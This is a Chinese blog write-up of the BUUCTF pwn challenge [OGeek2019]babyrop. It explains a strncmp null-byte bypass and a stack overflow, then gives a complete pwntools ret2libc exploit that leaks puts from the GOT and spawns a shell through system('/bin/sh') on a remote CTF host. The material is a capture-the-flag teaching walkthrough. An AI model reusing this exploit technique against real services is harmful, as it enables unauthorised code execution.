BUUCTF-Pwn-[OGeek2019]babyrop

21 篇文章 0 订阅

题目截图
在这里插入图片描述
检查文件信息
在这里插入图片描述
开启了NX和Full RELOR
用IDA打开,反汇编查看主函数
在这里插入图片描述
查看函数sub_804871F
在这里插入图片描述
buf[7]的大小为7个字节,而我们最多可以写入0x20个字节的数据,可以覆盖到v5,所以我们可以控制v5的值,在if判断中,如果buf中的字符串与s中的字符串不相同就会退出程序,但是v1控制strncmp函数比较的字符数,v1等于buf中字符串的长度,只要我们输入的数据以\0开始,v1就等于0,那么就可以绕过if判断
查看函数sub_80487D0
在这里插入图片描述
a1的值等于上一个函数中的v5,我们可以控制其为最大值0xff,就能造成栈溢出
再根据题目附件提供的链接库,就能计算system和/bin/sh的地址从而getshell
exp

from pwn import*

r=remote('node4.buuoj.cn',27113) 
f=ELF('/home/lhb/桌面/pwn')
libc=ELF('/home/lhb/桌面/libc-2.23.so')
puts_plt=f.plt['puts']
puts_got=f.got['puts']
main=0x8048825

payload=b'\0'*7+p8(0xff)
r.sendline(payload)
print(r.recvline())

payload=b'a'*(0xe7+4)+p32(puts_plt)+p32(main)+p32(puts_got)
r.sendline(payload)

libc_base=u32(r.recvline()[:-1].ljust(4,b'\0'))-libc.symbols['puts']
print(hex(libc_base))
system_addr=libc_base+libc.symbols['system']
binsh_addr=libc_base+libc.search(b'/bin/sh').__next__()

payload=b'\0'*7+p8(0xff)
r.sendline(payload)
print(r.recvline())

payload=b'a'*(0xe7+4)+p32(system_addr)+p32(main)+p32(binsh_addr)
r.sendline(payload)
r.interactive() #开启交互

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值